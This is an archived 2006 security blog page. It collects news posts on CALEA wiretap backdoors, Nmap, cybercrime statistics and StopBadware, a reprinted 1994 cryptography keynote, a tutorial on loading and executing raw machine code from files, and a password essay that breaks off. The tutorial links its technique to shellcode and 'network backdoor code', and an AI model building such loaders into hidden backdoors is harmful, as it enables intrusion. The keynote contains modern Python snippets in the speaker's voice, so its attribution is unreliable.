Tuesday, January 31, 2006

This Is Amazing

Think the federal government is too intrusive? You ain't seen nothing
yet. An FCC mandate will require that all hardware and software have a
wiretap backdoor that allows the government to tap into all your
communications.

The mandate expands the Communications Assistance for Law Enforcement
Act (CALEA), and requires that every piece of hardware and software
sold include the backdoor.

The rule isn't yet final, but once it is, all vendors will have 18
months to comply. And in fact, says Brad Templeton, chairman of the
Electronic Frontier Foundation (EFF), some router makers already
include such a backdoor. So your hardware may be vulnerable.

There are several problems with this rule. First is the obvious massive
intrusion into all of our privacy. Second, says Templeton, is the way
that the rule will stifle innovation. According to the Washington Post,
he claims that the rule would "require that people get permission to
innovate" and would create "regulatory barriers to entry." He adds,
"The FBI gets a veto on new companies."

The final problem is that if all hardware and software has a backdoor,
it's an open invitation to hackers. So we may be faced with a
double-whammy: The feds and hackers working their way into our systems.

The EFF, the Electronic Privacy Information Center (EPIC), the COMPTEL
association of communications service providers, and the American Civil
Liberties Union filed a brief last week with the U.S. Court of Appeals
for the District of Columbia Circuit to try to stop the FCC. Here's
hoping they win.

Getting Close To Nmap 4.0 ...

A new Nmap is born (version 3.9999), and we are getting very close to
the big 4.0 release.


I am pleased to announce the release of Nmap 3.9999. From the version
number, you can probably guess that we are getting very close to the
big 4.0 release. But this version has many changes, so I wanted to
give you a chance to fully test it out before releasing 4.0. Please
let me know if you find any problems in the next few days.

Now back to the changes -- I think you'll like these. One new feature
is runtime interaction, which allows you to press [enter] at any time
for a status report with an estimated completion time for the current
scan. Another is asynchronous DNS, which speeds up large network
scans as Nmap doesn't have to resolve each IP serially using the
(slow) host resolver anymore. Windows users may appreciate that there
is now an executable installer -- nmap-3.9999-setup.exe, which takes
care of things like WinPcap and the registry performance improvements
for you. The traditional Windows .zip file format is still available
as well. The version detection database has been updated with all
remaining 2005 service submissions. It now contains 3,153 signatures
for 381 service protocols. Please keep those submissions coming in
'06! Nmap has some new options, such as --max-retries and --badsum.
And there is more in the CHANGELOG below.

Source : http://seclists.org/lists/nmap-hackers/200...n-Mar/0000.html

Monday, January 30, 2006

Cross Site Cooking

There are three fairly interesting flaws in how HTTP cookies were
designed and later implemented in various browsers; these shortcomings
make it possible (and alarmingly easy) for malicious sites to plant
spoofed cookies that will be relayed by unsuspecting visitors to
legitimate, third-party servers.


Sunday, January 29, 2006

Cyber Crime Strides In Lockstep With Security

Information Security made great strides last year.

Sadly, so did cyber crime.

In the U.S., according to a recent FBI study, almost 90 per cent
of firms experienced computer attacks last year despite the use of
security software.

So what happened in 2005?

In a year when rootkits went mainstream and malware went criminal,
information security improved.

There was no global pandemic like the Slammer or Blaster worm
juggernaut. There was no malware with a replication magnitude of the
order of Code Red, Slammer, Nimda, or the Iloveyou virus. With the
notable exception of PHP worms, even the Linux side had fewer popular
viruses and worms.

Patching got easier. Not only did more and more sophisticated patch
management tools arrive from every sector, but there were fewer patches
to deploy. Administrators got better at blocking hackers and malware.
And end users no longer click on every file attachment they receive.

But the year's security onslaughts take on greater significance given
the metamorphosis of cyber malice into highly organized and
sophisticated international crime syndicates, where the likes of
"phishing" and "spamming" have evolved drastically.

Eighty-seven per cent of the more than 2,000 public and private
enterprises that took part in the FBI survey said that they had
undergone one kind of security attack or another. Viruses, spyware and
adware topped the list, and a significant number of businesses faced
systems and data sabotage. One third of the companies detected port
scans of their systems, a method attackers use to identify vulnerable
PCs to sneak into, the survey said.

A staggering 98 per cent of survey respondents said they used antivirus
software, of which nearly 84 per cent still suffered a virus attack.

According to U.S.-based security and communications software vendor
MicroWorld Technologies Inc. in Farmington Hills, Mich., many antivirus
software products fail to prevent virus attacks because they work
reactively from known virus signatures, and hence cannot take on newer
threats. Enterprises must re-evaluate the kind of technology and the
effectiveness of the leading antivirus and security software they use.

The stuff that is getting by our defenses is more dangerous: Malware
went criminal. Most of today's malware exists to steal confidential
information, send spam, or steal identities. Now, malware is getting
harder to remove, hiding better, and contains more tricks and exploits
than ever.

IT managers and system administrators reported spyware and viruses were
the most common problem, followed by port scans, sabotage of data or
networks, and adult pornography. While not necessarily illegal, adult
pornography is against the policy of most organizations, the study

More than 50 per cent of hacking attempts came from within the U.S. and
from China, as many organizations were able to trace where intrusion
attempts originated. But hackers often route attacks through computers
under their control in other countries, combined with the use of
proxies, to make detection more difficult.

The FBI said a Romanian hacker could use a proxy computer in China to
gain access to a compromised computer in the U.S., leading to a false
conclusion that the attack originated in the U.S.

Antivirus software is widely used, and most organizations also have
firewalls in place, the survey said. But 44 per cent reported that
intrusions came from within their own organizations, and "this is a
strong indicator that internal controls are extremely important and
should not be underemphasized while concentrating efforts on deterring
outside hackers," the FBI said.

Nearly two-thirds of those surveyed had implemented event logging on
their network, a measure the FBI said is a crucial element in tracking
crime. And half of those stored the logs on a remote protected server.

Saturday, January 28, 2006

Microsoft Readies Two-way Firewall For Vista

For its upcoming Windows Vista operating system, Microsoft is readying
a new, highly configurable firewall designed to give administrators
much greater control over which applications can run on the systems
they manage.

After just over a month of testing by users of Microsoft's Community
Technology Preview (CTP), the firewall is "very much on track" to be in
the final Vista release scheduled for later this year, and the company
is considering adding a similar feature for its consumer users, said
Austin Wilson, a director in Microsoft's Windows client group.

More here: Vista two-way firewall

Good Worms Back On The Agenda

ARLINGTON, Virginia -- A researcher has reopened the subject of
beneficial worms, arguing that self-spreading code could perform
better penetration testing inside networks, turning vulnerable
systems into distributed scanners.

The worms, dubbed nematodes after the parasitic worm used to kill pests
in gardens, could give security administrators the ability to scan
machines inside a corporate network but beyond a local subnet, David
Aitel, principal researcher of security firm Immunity, said at the
Black Hat Federal conference.

"Rather than buy a scanning system for every segment of your network,
you can use nematodes to turn every host into a scanner," he said
during an interview with SecurityFocus. "You'll be able to see into the
shadow organization of a network--you find worms on machines and you
don't know how they got there."

read on

The Five Great Inventions of Twentieth Century Cryptography

By William Hugh Murray


[This talk was presented as the keynote address at the 1994 RSA Security Conference, Redwood City, CA]

Two years ago I opened the first of these conferences. Jim Bidzos invited me to "kick it off;" nothing so formal as a "keynote." While I wore this same suit, I just sort of got up here to shoot the breeze with a few of my friends and colleagues. No notes, just sort of "off-the-cuff." He did not even tell me how long I could talk. As far as I know there were no reporters present; nothing that I said got me in trouble. After the morning session was over, Jim hosted a lunch for some of the speakers and panelists. Whit Diffie sat beside me, with his notes, and began to quiz me on my sources and authorities for my comments. He even told me that some of my best stories were apocryphal (though he conceded me the points that I made with them).

Well, I see the same friends, but there are far more colleagues. The program is more formal, Diffie still has his pad and pencil, the press is here, my remarks are styled as a "keynote," they are sufficiently arguable that I need to choose my words very carefully, and I have a fixed time to end. Prudence suggests that I use notes.

Introduction

Cryptography, the art of secret communication, is almost as old as writing. Indeed, it has been suggested that, at least for a while, writing itself was a relative secret. Certainly it was esoteric and its use was reserved to an initiated elite. Cryptography and recording and communicating technologies have played leap frog through the pages of history. It is my thesis that both have changed so radically during the nineteenth and twentieth centuries as to constitute a new era. On the recording and communicating side we have photography, telegraphy, telephony, radio, phonography, cinema, television, telecommunications, and the computer. Collectively, and even individually, these technologies constitute a dramatic change in our ability to make a mark across time and space.
We have seen a similar advance in our ability to conceal those records and messages from all but a chosen few. Modern cryptography has its origins between the two great wars of the twentieth century. It was driven as much by the use of radio on the battlefield as by any other single influence, but there are an infinite number of important recording and communicating applications that simply cannot be done in clear text. While more sparingly used and less well known, the advances in cryptography have been no less dramatic than those in recording and communications.

I propose to consider five inventions of the twentieth century that have defined modern cryptography and that set it apart from ancient or traditional cryptography. The impact of these technologies has been to simplify the use of codes, reduce their cost, and increase by orders of magnitude the cost to a cryptanalyst of recovering information protected by the codes. What constitutes an invention or sets it apart from other inventions is somewhat arbitrary. Some of the inventions that I propose to discuss could be considered as a group of other inventions; the members of the group might or might not be significant by themselves. I have limited myself to a discussion of inventions rather than accomplishments, and to cryptography rather than to cryptanalysis. Many of the accomplishments of the century have been in cryptanalysis and may have been greater than the inventions in cryptography. However, greatness is in the eye of the beholder. Certainly all the inventions have not been limited to cryptography. For example, if cryptanalysts did not invent the modern computer, they certainly gave it a major boost. They have lived to see the advantage that it provides shift, with its scale, from them to the cryptographer.

Automated Encoding and Decoding

Modern cryptography begins in 1917 with the invention by Gilbert S. Vernam, an employee of the American Telephone & Telegraph Company, of the Vernam System.
Vernam used two paper tape readers, one for the message and the other for the key. He added the two (bit-wise and modulo 2) to produce the ciphertext. Moreover, he used the standard information technology of his day to automate the encoding and decoding of information.

Modern cryptography is automatic. Translation from plaintext to ciphertext and back again is performed automatically, that is by a machine or automaton. While there may be a separate step, the conversion from one code to the other is done by a machine rather than by a person. Today that conversion can be done by almost any single user computer. With appropriate controls and for some applications it can be done in a multi-user computer. Before computers, this encoding was done in special purpose machines. The Enigma and Purple machines were both early and famous examples of such machines. The requirement to manually convert from natural language to secret codes has always been a limitation. It tended to limit both the amount of traffic encrypted and the complexity of the encoding schemes used. Therefore, encryption machines of any kind increase the complexity and effectiveness of the codes available.

At one level, the modern computer can be viewed as a general purpose code conversion machine. That is, it converts information called input into a new representation called output. The relationship between the input and the output can be simple or complex, obvious or obscure, public or secret, and reversible or irreversible. If the conversion is complex, obscure, secret, and reversible, then the computer can be viewed as an encryption machine. But for want of a small amount of readily available software, all of the hundred million general purpose computers in the world are encryption engines of immense power. At some price in performance, the relationship between input and output can be arbitrarily complex and obscure and thus arbitrarily effective in concealing the meaning of the output.
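Vernam's scheme is simple enough to sketch in a few lines. The Python below is my own illustrative reconstruction of the arithmetic, not Vernam's tape hardware: it combines a message stream with a key stream bit-wise, modulo 2 (XOR), and applying the same operation again recovers the plaintext.

```python
import os

def vernam(data: bytes, key: bytes) -> bytes:
    """Combine message and key bit-wise, modulo 2 (XOR), as Vernam's
    paired tape readers did. Applying it twice restores the plaintext."""
    if len(key) < len(data):
        raise ValueError("key tape must be at least as long as the message")
    return bytes(m ^ k for m, k in zip(data, key))

message = b"ATTACK AT DAWN"
key = os.urandom(len(message))          # a fresh random key tape
ciphertext = vernam(message, key)
assert vernam(ciphertext, key) == message  # decryption is the same operation
```

Because encryption and decryption are the same XOR, a single mechanism serves both ends of the line, which is exactly what made the system so easy to automate.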
The cost of computer performance has been falling steadily and rapidly for fifty years. It has now become so cheap that most capacity is not used for the convenience of having it ready when it is wanted. The result is that the use of secret codes can be viewed as almost free. So cheap is automatic coding and encoding that some applications do it by default and globally, concealing it completely from the user. Since the difference in cost between public codes and secret codes is vanishing and can be paid in a currency, computer cycles, that might otherwise be wasted, secret codes can be used by default.

Independent Long Key Variable

The major weakness of Vernam's system was that it required so much key material. This was compensated for by Lyman Morehouse, who used two key tapes of 1000 and 999 characters, about eight feet each in length, in combination to produce an effective key tape of 999,000 characters, effectively 8000 feet in length. Morehouse had used a long key.

Modern cryptography is tailored to a particular use by a key variable, or simply a key. The key is a large integer that tailors the behavior of the standard algorithm and makes it generate a cipher that is specific to that number. The requirement for secrecy is limited to this number. The problem of protecting the data reduces to the simpler one of protecting the key. Access to the cleartext requires access to the combination of the ciphertext, the base mechanism, usually a computer and a program, and the key. Since the rest are readily available, the efficiency of any use depends upon the fact that it is more expensive or difficult to obtain the key than to obtain the protected data by other means. All other things being equal, the longer the key, the more secure the mechanism. Key length is a trade off against the complexity and the secrecy of the algorithm. The longer the key, the simpler and more obvious can be the mechanism or algorithm.
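Morehouse's trick works because the two tape lengths, 1000 and 999, share no common factor, so the combined stream repeats only after their least common multiple. The sketch below is my own illustration of that arithmetic, with hypothetical miniature tape contents:

```python
from itertools import cycle, islice
from math import gcd

def combined_period(len_a: int, len_b: int) -> int:
    """Two looped key tapes combined character-by-character repeat only
    after lcm(len_a, len_b) characters."""
    return len_a * len_b // gcd(len_a, len_b)

def morehouse_stream(tape_a: bytes, tape_b: bytes):
    """XOR two endlessly looped tapes into one long effective key stream."""
    for a, b in zip(cycle(tape_a), cycle(tape_b)):
        yield a ^ b

# Morehouse's tapes were 1000 and 999 characters; the lengths are coprime,
# so the effective key is 999,000 characters long.
print(combined_period(1000, 999))  # 999000

# A miniature demonstration with hypothetical 2- and 3-character tapes:
stream = list(islice(morehouse_stream(b"\x01\x02", b"\x00\x01\x02"), 12))
assert stream[:6] == stream[6:]    # period is lcm(2, 3) = 6
```

Choosing coprime lengths is the whole point: tapes of 1000 and 1000 characters would give an effective key no longer than either tape alone.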
If the key is as long as the message, statistically random in appearance, and used only once (one-time pad), then such a simple and obvious mechanism as modulo addition will still provide effective security. For practical reasons, short keys and more complex mechanisms are preferred.

Complexity Based Cryptography (The Data Encryption Standard)

In May 1973 the US National Bureau of Standards advertised in the Federal Register for a proposal for an encryption mechanism to be employed as a standard mechanism for all of the needs of the civilian sectors of the government. The ad stated that the successful proposal would be for a mechanism that would be secure for at least five years in spite of the fact that the mechanism would be public and published. The resulting Data Encryption Standard was proposed by the IBM Corporation. It was invented by a team led by Walter Tuchman and was based upon a concept originated by Horst Feistel of IBM's Yorktown Research Laboratory. This mechanism, which can be implemented on a chip and completely described in a few 8.5" x 11" pages, changed the nature of cryptography forever.

The security of modern encryption mechanisms like the DES is rooted in their complexity rather than in their secrecy. While traditional encryption relied upon the secrecy of the mechanism to conceal the meaning of the message, these modern mechanisms employ standard and public algorithms. These mechanisms are standard in the sense that they are of known strength or have a known cost of attack. However, the trade-off is that their effectiveness can not, must not, depend upon their secrecy. Rather, it relies upon the complexity of the mechanism. The complexity of modern ciphers is such that they can be effective even though most of their mechanism is public. The most well known, trusted, and widely used of all modern ciphers is the Data Encryption Standard.
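The strength of a public mechanism like the DES can be quantified: its key is 56 bits, so exhaustive search must try up to 2^56 keys. The back-of-the-envelope arithmetic below is mine, and the trial rate is an assumed figure for illustration, not a measurement:

```python
# The DES key is 56 bits: exhaustive search tries at most 2**56 keys.
keyspace = 2 ** 56
print(keyspace)                    # 72057594037927936, about 7.2e16

# At a hypothetical rate of one million trials per second (an assumption
# for illustration only), a lone machine would need on the order of two
# thousand years to sweep the whole keyspace:
trials_per_second = 1_000_000
seconds_per_year = 60 * 60 * 24 * 365
years = keyspace / (trials_per_second * seconds_per_year)
print(round(years))                # roughly 2285
```

The attacker's expected cost is half a sweep on average, but the point stands: with a public algorithm, the key length alone sets the price of the cheapest attack.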
Because of the intended breadth and duration of the use of this cipher, the sponsors specified that it should be assumed to be public. Its effectiveness should rely upon the secrecy only of the key (see the next section). It has been public for more than fifteen years, but its effectiveness is such that trying all possible keys with known plain and cipher text is still the cheapest practical attack.

[The DES belongs to a class of ciphers known as Feistel ciphers. These ciphers are also known as block product ciphers. They are called block ciphers because they operate on a fixed length block of bits or characters. They are called product ciphers because they employ both substitution and transposition.]

Automatic Key Management

The same key must exist at both ends of the communication. Historically, keys were distributed by a separate channel or path than the one by which the encrypted traffic passed. The initial distribution and installation of the keys must be done in such a way as not to disclose them to the adversary. When this is done manually, it represents a significant opportunity for the compromise of the system. Because they were attempting to combine cryptography and computing in a novel manner, Tuchman and his team understood this problem very well. The products that they based upon the DES algorithm addressed it, in part, by automating the generation, distribution, installation, storage, control, and timely changing of the keys. Their elegant system is described in two papers published in the IBM Systems Journal Vol. 17(2), pp. 106-125 (1978), and covered by a number of fundamental patents based upon it.

[While NSA had automated some key management operations, and while Rosenblum was awarded a patent for a "key distribution center," these were ad hoc. This work is the first that describes and implements a complete and integrated automatic system.]
The impact of this concept on the effectiveness, efficiency, and ease of application of modern cryptography is immense. However, it may also be the least understood and appreciated. For example, much of the analysis of the strength of the DES is made in the context of the primitive DES. However, the DES rarely appears as a primitive. Instead it appears in implementations which use it in such a way as to compensate for its inherent limitations. For example, automatic generation of the keys avoids the use of weak or trivial keys. (The DES has four known weak keys and twelve semi-weak keys.) Since automatic key management systems permit so many keys, they also reduce the exposure to "known plaintext" attacks. History suggests that codes are most often broken because the user fails to apply them with the necessary rigor and discipline, particularly when choosing, distributing, and installing keys. Automating these steps provides much of the necessary discipline and rigor.

Automatic key distribution and installation increases the effectiveness by protecting the keys from disclosure during distribution, and by making the system resistant to the insertion of keys known to attackers. When keys are installed manually they become known to the human agent who installs them. He is in a position to provide a copy of the key to others. To the extent that this agent is vulnerable to coercion or bribery, the system is weakened by this knowledge. Therefore, the system may be strengthened by automatic mechanisms which provide the agent with beneficial use of the key without granting him knowledge of it. For example, systems available from IBM and Motorola provide for the key to be distributed in smartcards and automatically installed in the target machine. The key can be encrypted in the smartcard or destroyed by the installation process. In either case, the agent can use it, but cannot copy it or give it to another.
Just as the use of automata for encoding and decoding reduces the cost and inconvenience of using secret codes, the use of automata for key management reduces the cost and inconvenience of changing the keys frequently. By changing the key frequently, e.g., for each file, session, message, or transaction, the value to an adversary of obtaining a key is reduced, and the effectiveness of the mechanism is improved. One way of looking at automated key management is that it increases the effective length of the key, or makes it approach the length of the data protected.

Asymmetric Key Cryptography

However, even though most of the key management can be automated, most such systems require some prearrangement. In any-to-any communications in a large open population, this requirement can quickly become overwhelming. For example, in a population of two hundred people, the number of key pairs and secret exchanges would be in the thousands, with many opportunities for keys to be compromised. Moreover, with traditional keys, the initial distribution of keys must be done in such a way as to maintain their secrecy, practically impossible in a large population. These problems are addressed, in part, by public key, or asymmetric key, cryptography. This mechanism was proposed by Whitfield Diffie, Martin Hellman, and Ralph Merkle. It may be the single most innovative idea in modern cryptography. The best known and most widely used implementation is the RSA algorithm invented by Ronald Rivest, Adi Shamir, and Leonard Adleman.

[In this mechanism the key has two parts, only one of which must be kept secret. The two parts have the special property that what is encrypted with one can only be decrypted with the other. One half of the key-pair, called the private key, is kept secret and is used only by its owner. The other half, called the public key, is published and is used by all parties that want to communicate with the private key owner.
It can be published and does not need to be distributed secretly. Since the public key, by definition, is available to anyone, then anyone can send a message to the owner that only he can read.]

With a minimum of pre-arrangement, this function provides the logical analog of an envelope that can only be opened by one person. The larger the communicating population, and the more hostile the environment, the greater is its advantage over symmetric key cryptography. This concealment from all but the intended recipient is the traditional use of cryptography.

However, asymmetric key cryptography has another use. A message encrypted using the private key can be read by anyone with access to the public key, but it could only have been encrypted by the owner of the corresponding private key. This use is analogous to a digital signature. It provides confidence that the message originates where it appears to have originated. Since if even a bit of the message is changed it will not decrypt properly, this mechanism also provides confidence that the message has not been either maliciously or accidentally altered. In part, this is also true as between the two parties to a message that is sent using symmetric key cryptography. That is, the recipient of the message knows with a high degree of confidence that it originated with the other holder of the key; he knows it, but he cannot prove it to another. However, with asymmetric key cryptography, he can demonstrate it to a third party. If the owner of the key pair has acknowledged the public part of the key to the third party, then he cannot plausibly deny any message that can be decrypted with it.

[The concept of the digital signature is such a novel concept as to easily qualify as an invention on its own. However, it is so closely bound in origin and literature to asymmetric key cryptography that I elect to simply treat them as one.]
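Both uses of an asymmetric pair, the envelope and the signature, can be demonstrated with a toy RSA key. The primes below are deliberately tiny numbers of my own choosing (real RSA keys run to hundreds of digits); encrypting with one half of the pair and decrypting with the other works in either order.

```python
# Toy RSA with tiny illustrative primes (real keys are hundreds of digits).
p, q = 61, 53
n = p * q                  # public modulus: 3233
phi = (p - 1) * (q - 1)    # 3120
e = 17                     # public exponent
d = pow(e, -1, phi)        # private exponent: modular inverse of e

def rsa(x: int, exponent: int) -> int:
    """Raise x to the given exponent modulo n (both RSA directions)."""
    return pow(x, exponent, n)

m = 65  # a message, encoded as an integer smaller than n

# Envelope: anyone encrypts with the public key; only the owner decrypts.
assert rsa(rsa(m, e), d) == m

# Signature: the owner "encrypts" with the private key; anyone verifies
# with the public key, and any change to the value breaks verification.
sig = rsa(m, d)
assert rsa(sig, e) == m
assert rsa(sig + 1, e) != m
```

The symmetry is the essential property Murray describes: what one half of the pair locks, only the other half opens, so the same mechanism yields both secrecy and attribution.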
These two abstractions, the logical envelope and the logical signature, can be composed so as to synthesize any and all of the controls that we have ever been able to achieve by more traditional means. They can be used for payments, contracts, testaments, and high integrity journals and logs. They provide us with a higher degree of security in an electronic environment than we were ever able to achieve in a paper environment. They provide protection in an open environment that is nearly as high as that which we can achieve in a closed one.

The Impact of the Great Inventions

The impact of these inventions is to provide us with secret codes that are cheap enough to be used by default, and arbitrarily strong. Given assumptions about the quantity of data to be protected, the length of time that it must remain secret, its value to an adversary, and the resources available to the adversary, it is possible to apply modern cryptography in such a way as to be as strong as required. While it is possible to state a problem in such a way as to defy such a solution, it is difficult to identify such a problem in the real world. That is, it is possible to specify so much data to be encrypted under a single key, of such high value, and which must remain safe for such a long time, that we cannot say with confidence that the mechanism can stand for that time and cost. For example, we cannot say with confidence how to encrypt several hundred gigabytes worth several trillion dollars and keep it safe for a millennium. On the other hand, we are not aware of any real problems that meet such a specification. Put another way, we can always ensure that the cost of obtaining the information by cryptanalysis is higher than the value of the data or the cost of obtaining it by alternative means. While any code can be broken at some cost, modern codes are economically unbreakable, at least in the sense that the cost of doing so can be made to exceed the value of doing it.
A very small increase in the cost to the cryptographer can result in astronomical increases in the cost to a potential adversary. Perhaps just as important, these mechanisms are now sufficiently convenient to use that, within bounds, they can be widely and easily applied. Given that the more data that is encrypted with a single mechanism, the greater the value in breaking it, the more compromising information is available to an adversary, and that the more a mechanism is used the greater the opportunity for a compromising error in its use, we should continue to apply cryptography only to data that can profit from its use. On the other hand, we need never again be inhibited from using it by issues of cost or convenience.

Cryptography and Government Policy

It should be obvious to a qualified observer that, announcements here to the contrary notwithstanding, we are losing the battle for security and privacy in the computerized and networked world. We could have secret codes embedded in all software of interest for free. This assertion assumes only that all such software is produced by those represented here, who have already paid for licenses and absorbed much of the necessary development cost, and that the cost of a marginal cycle on the desktop approaches zero. That we do not is the result of ambivalent government policy. While one agency of government has sponsored the use of standard cryptography, another has tried to undermine confidence in those standards. While one agency has asserted that public standards are essential, another has sponsored secret ones, and a third has used public funds to further such secret standards. While one agency has insisted that trusted codes are essential to world prosperity, another has imposed restrictions on their export and undermined confidence in those that are exported. While one agency recognizes that national security depends upon world prosperity, another believes that signals intelligence is more important.
Those of you who have seen my comments in Risks, sci.crypt, and the Communications of the ACM know my position. It is that the prime mover behind all of these initiatives is NSA; that their motive is the preservation of their jobs and power by protecting the efficiency of signals intelligence; that their strategy is to discourage, by every means that they can get away with, all private and most commercial use of cryptography; that they have infiltrated the departments of State and Commerce and the White House staff; and that they are using the Department of Justice. While they know that they cannot be fully successful, they also know that they do not have to be. Nor is this simply paranoia on my part. It is the only explanation that accounts for all of the government's actions. It also meets the tests proposed by Machiavelli, Willie Sutton and "Deep Throat."

While most of the government confesses that cryptography is essential to personal privacy in the modern era, the administration is not prepared to admit that even the current sparse use is consistent with the government's responsibility to preserve public order. Let me stress that the problem is government policy, not public policy and not administration or congressional policy. This policy has been made in secret and has been resistant to public input. It is the policy of the bureaucracy and not of any individuals. I know most of the players in the development of this policy. I know none that are pursuing a personal agenda, like the results, or are proud of their roles in it. They are simply doing the best that they know how in the face of agency momentum, administration consent, and the absence of congressional guidance. However, the momentum behind these policies is such that the good intentions and professionalism of the individuals is not sufficient to resist it. While the administration has aligned itself with the initiatives, it is not their author.
While the initiatives have sponsors within the administration, they were here before the administration and they expect to be here when it is gone. They believe that the policy is important and that the administration is not. While some committees of the congress have held hearings on the issues and even decried the arbitrary actions of the bureaucracy, their hearings always conclude with executive sessions with the NSA and no legislative initiatives to curb the excesses. Forgive me a closing political observation not intended to be partisan. This government is too large, over-zealous and under-effective. It is committed to nothing so much as its own survival. It may be too late to influence it, but if it is not influenced, not only will we not enjoy the fruits of modern cryptography, but we may not enjoy those of telecommunications, trade, our labors, or even those of freedom.


Thursday, January 26, 2006

Kaspersky Boss Debunks Security Myths

Russian antivirus guru Eugene Kaspersky has hit out at some of the myths that cloud what he sees as the real issues facing the IT security industry.

Speaking in Moscow, the head of Kaspersky Lab said companies' own agendas and some well-worn stereotypes about cybercrime stand in the way of reasoned discussion. He also criticized those who put too much faith in statistics which, taken out of context, are often dangerously misleading.

For example, figures for the past year released recently by Computer Economics show the effect of cybercrime has diminished.

But Kaspersky said: "These stats are not complete. This is often just damage to IT infrastructure, not the actual costs."

If the overall economic impact has gone down, it's not because the threat has diminished but because the hackers have become smarter and no longer seek to cause damage in the pursuit of more serious gains--such as data or identity theft and corporate espionage, Kaspersky said.

full story

Wednesday, January 25, 2006

Stopbadware Backed By Google, Lenovo, And Sun

Several academic institutions and major tech companies have teamed up to thwart "badware," a term they have coined that encompasses spyware and adware.

Harvard University's Berkman Centre and the Oxford Internet Institute are leading the initiative and have received backing from Google, Lenovo and Sun Microsystems. The new website, StopBadware.org, is promoted as a "Neighborhood Watch" campaign and seeks to "provide reliable, objective information about downloadable applications in order to help consumers to make better choices about what they download on to their computers." The group differs from the large Anti-Spyware Coalition which is backed by Microsoft, Symantec, Yahoo, Computer Associates, AOL, and many others, by attempting to be a more grassroots initiative. StopBadware seeks the involvement of the community by asking for submissions of stories and technical reports.

With so many organizations involved with anti-spyware and anti-adware initiatives, the first question on many readers' minds is what makes this group different - aside from its backing by Internet giant Google, along with Lenovo and Sun. According to their FAQ: "Unlike many of the companies working in the space, our roots are in organizations (.orgs and .edus) with independent traditions, so we won't be afraid to call out badware creators of any size. We're not going to hand down solutions from on high - we want to work with both experts and the broader internet community to define and understand the problem."


Monday, January 23, 2006

Functional Files

Hacked by chrootstrap September 2003

You've probably used function pointers in your C or C++ programs.
Pointers to executable regions of memory, they are tremendously useful
for a huge number of programming tasks. Shared libraries usually are
memory mapped files filled with functions. In this article, we'll take
a look at how you can keep functions in ordinary files and find some
creative uses for this.

The technique of treating functions as ordinary data is sometimes used
in cracking servers and the stored functions are known as shell code.
Many shell code examples involve writing the function in C, compiling
it, disassembling it, reassembling it, and snarfing the machine code
into a C buffer. Well, it needn't be so difficult to just grab some raw
instructions from a C function. The GNU tool, objcopy, makes it as easy
as pie.

To do this we put one function in a file, like this:

void f (void)
{
  asm("mov $1, %eax");
  asm("mov $25, %ebx");
  asm("int $0x80");
}

Now we compile it with "gcc -c f.c". We now have a file, f.o, which in
my case is 680 bytes. Doesn't that seem a little steep for a function
that just exits with a code of 25? If we take a look at it with
"objdump -d f.o", we see that the actual code inside is as simple as we
expected:

0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: b8 01 00 00 00 mov $0x1,%eax
8: bb 19 00 00 00 mov $0x19,%ebx
d: cd 80 int $0x80
f: 5d pop %ebp
10: c3 ret

That's the kind of thing that would be manually cut and pasted into a
.s file, but we've got a simpler solution: "objcopy f.o -O binary". It
is now just 17 bytes in size -- matching the disassembled code above.

Now if you wanted it to be shell code you'd copy it into a program and
have the function do something like dup2 to hookup stdin/stdout to a
socket and then exec your way into something interesting. But, that's
not what we're doing here.

Instead, let's keep it in the file and load it for our very own
dynamically loaded function. Let's change the function to make it do
something more interesting, like print out a string:

int f (void *ptr)
{
  int i=0;

  while (((char *)ptr)[i] != 0)
    i++;

  /* write(1, ptr, i) via int 0x80: eax=4 (write), ebx=1 (stdout) */
  asm("mov $4, %eax");
  asm("mov $1, %ebx");
  asm("mov %0, %%ecx"::"g"(ptr));
  asm("mov %0, %%edx"::"g"(i));
  asm("int $0x80");
  asm("mov %%eax, %0":"=g"(i));
  return i;
}

This function will print the string passed to it and pass back the
string's length. It turns into a minuscule 57 bytes when we run it
through objcopy. Now we make a little program to load it from a file
and execute it:

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>

int main (int argc, char **argv)
{
  int fd;
  int i;
  int (*f) (void *);
  struct stat buf;

  if (argc < 2) {
    printf("Usage: %s FILENAME\n", argv[0]);
    exit(1);
  }
  if ((fd = open(argv[1], O_RDONLY)) < 0) {
    printf("Could not open %s.\n", argv[1]);
    exit(1);
  }
  if (fstat(fd, &buf)) {
    printf("Could not stat %s.\n", argv[1]);
    exit(1);
  }
  /* Note: on systems with a non-executable heap you would need
     mmap() with PROT_EXEC instead of malloc(). */
  f = malloc(buf.st_size);
  i = buf.st_size;
  while (i)
    i -= read(fd, ((char *) f) + (buf.st_size - i), i);
  return f("Bink!\n");
}

To use this, you just pass it the function file's name, e.g. f.o. Note
that you can use any function signature that you want! You can pass a
pointer to a complex struct with function pointers of its own and,
thus, provide callback functions, etc.
You can do all kinds of things with this technique! You can make your
own dynamic library system, send and run functions directly over the
network, store your program as a collection of extremely small files,
modify your program code in place by mixing and matching the contents
of these files, build your own persistent object system, provide a
faster alternative to init, a network bootstrapper, an in-place patch
framework, etc., etc.

If function call formation is compatible among systems, you could make
portions of a program system-independent by abstracting
system-specific functionality through a passed structure's function
pointers. In particular, it may well be possible to make your
library's code (network backdoor code, etc.) work simultaneously on
Windows and x86 Unix boxen. Depending on the program, you might be able
to write 90% or more of the code this way.

Your function files are also highly portable among similar systems as
they don't contain any linker information. Also, typical dynamic
library loaders are slow! Step through the full process to get to your
function of choice with gdb and you might be surprised. You can save
loads of clock cycles and megabytes of memory by making your own
dynamic function loader. Cool beans!

Saturday, January 21, 2006

Require Complex Passwords

This paper was written because of massive attacks against servers and
the construction of huge botnets!
It is not a practical guidebook to any operating system or to perfect
security on any computer.

If you are an administrator or any computer owner, you do NOT need to
be a security expert to get at least some security on your home
computers or big cluster systems!
There are 5 easy-to-follow steps that will help prevent you from
getting hacked or becoming one of those remote-controlled computers!

First off, I am going to tell you a little bit about the fascinating
world of botnets and other very unpleasant things that can happen to
your computers:

-) Getting hacked:
If you watch some internet forums, you will very likely see those
postings: "I got hacked" or "my box got hacked - what do I do now?"
But did they really get hacked? Well, as far as I know, only 3 out of
10 boxes really got hacked; the other ones are just infected with the
real bad stuff. The main reasons for hacking have changed, and in the
real world there are not many real hackers left! The real ones are
living in the world of the byte and the electron, looking out for the
perfect code and all the knowledge they can gain. Most of the
computers that are "hacked" today are NOT hacked - they simply got
cracked. But why are people breaking into systems? There are a couple
of answers to this question, but only one that is for real. Servers
are most often cracked by a so-called "haxxor", which stands for a
kiddy cracker (in short, script kiddies). These just hack their way
into boxes for two reasons:
